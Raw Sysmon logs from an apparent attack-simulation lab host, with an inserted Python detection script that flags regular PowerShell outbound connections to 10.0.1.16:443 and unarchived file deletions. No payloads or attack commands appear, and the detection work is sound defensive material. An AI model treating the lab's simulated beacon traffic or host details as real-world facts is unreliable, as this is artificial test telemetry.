13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:08.227{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.227{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.226{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.210{B81B27B7-9F30-6140-4B56-04000000C801}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:08.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5FCE2A9951CB0E59CC839A8792ED2E,SHA256=8A1F9B83A3CCFABA1DC93422688B6197BCB9B9D9CD71110BCAF11634C8B59750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:09.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E48885003619F6D03B453579832167BE,SHA256=99A43D9A184034EFE7A059FA5DC69BCCD638ABC8AF08B6998C5991E486F53AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:09.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BA854B17A0DC7714E022F92971A7E16,SHA256=B9202A7BFE57E52027FA4A93D5BE9E7835CEF716D310C754CA1C56D6C45D68B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:09.208{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B446FE2B2B9240FCD1CA04C952BDD6B,SHA256=5D542BD2E43BA6E54F9EC01DDE158A5F7D0ECEE5AED63F1DF1CE7B09342909CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:10.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C7F87552419B316558DC4AD4AC22763,SHA256=372152AE3F2A34B3ADFBFA83BE5A97F4683DD18317C99EB6C3E25B808A48C734,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:40.805{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50364-false10.0.1.12-8000- 23542300x800000000000000036496094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:11.275{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59537F51147313026EAB5384EC599396,SHA256=C174A254941BF420C7DD8A1380E58992234FCA00F33B9CA6F778054732251AAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:11.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E67B15155A034645ECC9FC16FD4E36A3,SHA256=7F1669487F3F8CE772C9FE3100411D9E7D1F064782A8BC342FE0741CF2E3B7C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:10:41.502{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50365-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:12.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED0DEF8D49A7598628350C5D231258EC,SHA256=FA53E0CDDCA18C63782B5DA90E401B5BAE841CC15312E895EF9F6B8D63AC74E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:13.322{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A322DDBB7CC6044AF089F5B516DF1B30,SHA256=DB1AE06E4FCC2B6C03DBF298F7AAF1BDFA093B1C123BA3CDEC928CC35218D814,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:14.332{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C06B8CCFAEAC1B4A69AF0EABD524320D,SHA256=2C8542E3E543E7EDA872FA854919C4B3C8A87338260FC920664655AB9E125CE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
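Two patterns in the records above are worth running detection logic over rather than eyeballing: the Event ID 3 (NetworkConnect) records show powershell.exe, running as ATTACKRANGE\REED_SCHMIDT, connecting to 10.0.1.16:443 at roughly five-second intervals (source ports 50361, 50363, 50365), while the Splunk forwarder components connect to 10.0.1.12:8000 and :8089 just as regularly; and the Event ID 23 (FileDelete) records carry `Archived = false - insufficient disk space`, meaning Sysmon could not keep a copy of the deleted file. The script below is an added example and is not part of this dataset or of the Splunk attack_range project. The Sysmon events it parses are constructed inline in the XML form the Windows Event Log emits, with field names from the Sysmon schema and values mirroring the records above; the `KNOWN_TELEMETRY` baseline (the forwarder's indexer endpoints) is an assumption you would replace with your own inventory. The point it makes is that a periodicity check alone flags the forwarder as readily as the PowerShell process, so known-agent destinations must be baselined out.

```python
"""Detection pass over Sysmon Event ID 3 (NetworkConnect) and 23 (FileDelete).
Sample events are CONSTRUCTED for this example; field names follow the Sysmon
schema and values mirror the log above (powershell.exe -> 10.0.1.16:443,
streamfwd.exe -> 10.0.1.12:8000, unarchived deletions of forwarder checkpoints)."""
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from xml.sax.saxutils import escape

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
HOST = "win-host-987.attackrange.local"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FWD = r"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"
PS_GUID = "{B81B27B7-4822-613A-788F-03000000C801}"
FWD_GUID = "{B81B27B7-401D-611D-6900-00000000C801}"
# Assumed inventory of legitimate telemetry endpoints (splunkd -> 8089, streamfwd -> 8000).
KNOWN_TELEMETRY = frozenset({("10.0.1.12", 8000), ("10.0.1.12", 8089)})


def sysmon_event(event_id, computer, **data):
    """Render one Sysmon event as the XML the Windows Event Log emits (constructed sample)."""
    fields = "".join(f'<Data Name="{k}">{escape(str(v))}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><Provider Name="Microsoft-Windows-Sysmon"/>'
            f'<EventID>{event_id}</EventID><Channel>Microsoft-Windows-Sysmon/Operational</Channel>'
            f'<Computer>{computer}</Computer></System><EventData>{fields}</EventData></Event>')


def net(utc, guid, image, user, sport, dip, dport):
    return sysmon_event(3, HOST, UtcTime=utc, ProcessGuid=guid, Image=image, User=user,
                        Protocol="tcp", Initiated="true", SourceIp="10.0.1.15",
                        SourcePort=sport, DestinationIp=dip, DestinationPort=dport)


def filedelete(utc, image, target, archived):
    return sysmon_event(23, HOST, UtcTime=utc, Image=image, TargetFilename=target,
                        IsExecutable="false", Archived=archived)


# One event per line, timestamps and ports taken from the records above.
SAMPLE_LOG = "\n".join([
    net("2021-09-14 13:10:28.800", FWD_GUID, FWD, r"NT AUTHORITY\SYSTEM", 50360, "10.0.1.12", 8000),
    net("2021-09-14 13:10:30.485", PS_GUID, PS, r"ATTACKRANGE\REED_SCHMIDT", 50361, "10.0.1.16", 443),
    net("2021-09-14 13:10:34.817", FWD_GUID, FWD, r"NT AUTHORITY\SYSTEM", 50362, "10.0.1.12", 8000),
    net("2021-09-14 13:10:35.495", PS_GUID, PS, r"ATTACKRANGE\REED_SCHMIDT", 50363, "10.0.1.16", 443),
    net("2021-09-14 13:10:40.805", FWD_GUID, FWD, r"NT AUTHORITY\SYSTEM", 50364, "10.0.1.12", 8000),
    net("2021-09-14 13:10:41.502", PS_GUID, PS, r"ATTACKRANGE\REED_SCHMIDT", 50365, "10.0.1.16", 443),
    filedelete("2021-09-14 13:10:09.261",
               r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe",
               r"C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security",
               "false - insufficient disk space"),
])


def parse_events(xml_text):
    """Return one dict per <Event>: EventID, Computer, plus every <Data Name=...> field."""
    events = []
    for line in xml_text.splitlines():
        if not line.strip():
            continue
        root = ET.fromstring(line)
        ev = {"EventID": int(root.find(f"{NS}System/{NS}EventID").text),
              "Computer": root.find(f"{NS}System/{NS}Computer").text}
        for d in root.iter(f"{NS}Data"):
            ev[d.get("Name")] = d.text or ""
        events.append(ev)
    return events


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def periodic_connections(events, min_count=3, max_cv=0.25, baseline=frozenset()):
    """Group initiated Event ID 3 records by (process, destination) and report groups
    whose inter-connection gaps are regular (low coefficient of variation).
    Destinations in `baseline` are skipped: a forwarder beats as regularly as an implant."""
    groups = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 3 or ev.get("Initiated") != "true":
            continue
        dest = (ev["DestinationIp"], int(ev["DestinationPort"]))
        if dest in baseline:
            continue
        groups[(ev["ProcessGuid"], ev["Image"], ev["User"], dest)].append(_ts(ev["UtcTime"]))
    hits = []
    for (guid, image, user, dest), times in groups.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            hits.append({"image": image, "user": user, "dest": dest,
                         "count": len(times), "mean_gap_s": round(avg, 2)})
    return hits


def archive_failures(events):
    """Event ID 23 records whose Archived field starts with 'false': Sysmon deleted
    nothing itself, but it could not retain a copy of the file that was removed."""
    return [ev["TargetFilename"] for ev in events
            if ev["EventID"] == 23 and ev.get("Archived", "").startswith("false")]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("periodic, no baseline:", len(periodic_connections(evs)), "groups")
    for hit in periodic_connections(evs, baseline=KNOWN_TELEMETRY):
        print("periodic outbound:", hit)
    print("unarchived deletions:", archive_failures(evs))
```

Without the baseline both the PowerShell process and streamfwd.exe are reported; with it only the PowerShell group to 10.0.1.16:443 survives, which is the one an analyst would pivot on (parent process, command line, and the 4104 script-block logs the forwarder was also shipping). The `archive_failures` result is an operational finding rather than an attack indicator: when Sysmon cannot archive deleted files, the file-content evidence for any real deletion on that host is gone, so disk headroom for the archive directory is part of the detection posture.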
23542300x800000000000000036496111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:15.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=539B031520D9A1C2E7ABFB971F28B168,SHA256=30D6C1934190C3EE702A1944ED38434B3B48D9DDD29E2E6CAA5253127D15263E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:15.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4835F2AE640A5CE538DBA32577A8BCEE,SHA256=99FC1701B7FECBED0A76220895D52D3EDAAF08C4AE5F2C07ED8C2C82FB4F72C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036496109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a2c3382) 13241300x800000000000000036496107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 
13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a961-0x7a29a397) 13241300x800000000000000036496106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a969-0xdbee0b97) 13241300x800000000000000036496105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0x3db27397) 13241300x800000000000000036496104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a2c3382) 13241300x800000000000000036496102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a961-0x7a29a397) 13241300x800000000000000036496101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 
13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a969-0xdbee0b97) 13241300x800000000000000036496100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:10:15.197{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0x3db27397) 354300x800000000000000036496114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:46.790{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50367-false10.0.1.12-8000- 354300x800000000000000036496113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:46.529{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50366-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:16.411{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D16823F269684F8ABFE92DF26F1307,SHA256=EA4CB27571B3B277DFD4744C91C892DCA828E912384A4152B86029FDD0412AF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:17.428{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A546064DE0728B27530526A689F7DA4A,SHA256=4B5A6795874984DCDB14A06215CA02FDB3F415276E80060B0766D18BC4365D90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:18.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01BF8AA9831F50F325D255F9C6289953,SHA256=F2DFD988136675765C00CEBA613FF591A0DFF6DDEC0A543B2F488EA7F49151F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:19.477{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CD19BD66B177F80763464EC9F664C10,SHA256=1F0019250DACFFD3519270DB114E376B43BF34BE0B41A08A2C8CD867D26828BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:20.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E7D6C7071312221135FE889C8207FC1,SHA256=09893F29133DBDCA38CE54EE7D4D9291ADFE98775B0712E24553F27A22E9DC6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 23542300x800000000000000036496120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:21.975{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8A39EECEE6F4E1CC15EAB57C8D08156D,SHA256=843A12E888C4441AC85117716813DCC2E280CE65BB5FD16FAD7733A3A88EB1D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:21.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F580B1467B0810F7C20C326475BFE3,SHA256=CF444D407B3BA1529B94C118DCA80EA90778FBAA5232514DD2E0034856611F71,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:22.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A17D39632CB41DBFA7144C16981B90B,SHA256=20D927EBA3DC89AC151DEBFD2F7203DACBF566CD36766F4DC020A873BF62645E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:52.823{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50369-false10.0.1.12-8000- 354300x800000000000000036496121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:52.539{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50368-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:23.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 